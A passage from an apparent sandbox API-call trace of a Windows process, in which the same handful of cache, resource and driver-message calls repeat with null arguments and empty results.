lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.682] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.682] GetUserDefaultLangID () returned 0x409 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.682] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.682] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.682] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.682] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.682] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.683] GetUserDefaultLangID () returned 0x409 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.683] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.683] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.683] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.683] GetUserDefaultLangID () returned 0x409 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.683] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.683] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.683] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.683] GetUserDefaultLangID () returned 0x409 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.683] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.683] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.683] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.683] GetUserDefaultLangID () returned 0x409 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.683] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.683] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.683] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.683] GetUserDefaultLangID () returned 0x409 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.683] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.683] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.683] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.683] GetUserDefaultLangID () returned 0x409 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.683] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.683] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.683] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.683] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.684] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.684] GetUserDefaultLangID () returned 0x409 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.684] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.684] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.684] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.684] GetUserDefaultLangID () returned 0x409 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.684] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.684] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.684] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.684] GetUserDefaultLangID () returned 0x409 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.684] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.684] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.684] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.684] GetUserDefaultLangID () returned 0x409 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.684] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.684] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.684] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.684] GetUserDefaultLangID () returned 0x409 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.684] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.684] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.684] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.684] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.684] GetUserDefaultLangID () returned 0x409 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.684] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.684] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.685] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.685] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.685] GetUserDefaultLangID () returned 0x409 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.685] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.685] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.685] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.685] GetUserDefaultLangID () returned 0x409 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.685] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.685] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.685] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.685] GetUserDefaultLangID () returned 0x409 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.685] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.685] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.685] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.685] GetUserDefaultLangID () returned 0x409 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.685] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.685] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.685] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.685] GetUserDefaultLangID () returned 0x409 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.685] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.685] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.685] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.685] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.685] GetUserDefaultLangID () returned 0x409 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.685] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.686] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.686] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.686] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.686] GetUserDefaultLangID () returned 0x409 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.686] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.686] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.686] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.686] GetUserDefaultLangID () returned 0x409 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.686] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.686] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.686] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.686] GetUserDefaultLangID () returned 0x409 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.686] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.686] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.686] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.686] GetUserDefaultLangID () returned 0x409 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.686] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.686] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.686] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.686] GetUserDefaultLangID () returned 0x409 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.686] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.686] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.686] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.686] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.687] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.687] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.687] GetUserDefaultLangID () returned 0x409 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.687] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.687] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.687] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.687] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.687] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.687] GetUserDefaultLangID () returned 0x409 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.687] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.687] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.687] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.687] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.687] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.687] GetUserDefaultLangID () returned 0x409 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.687] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.687] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.687] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 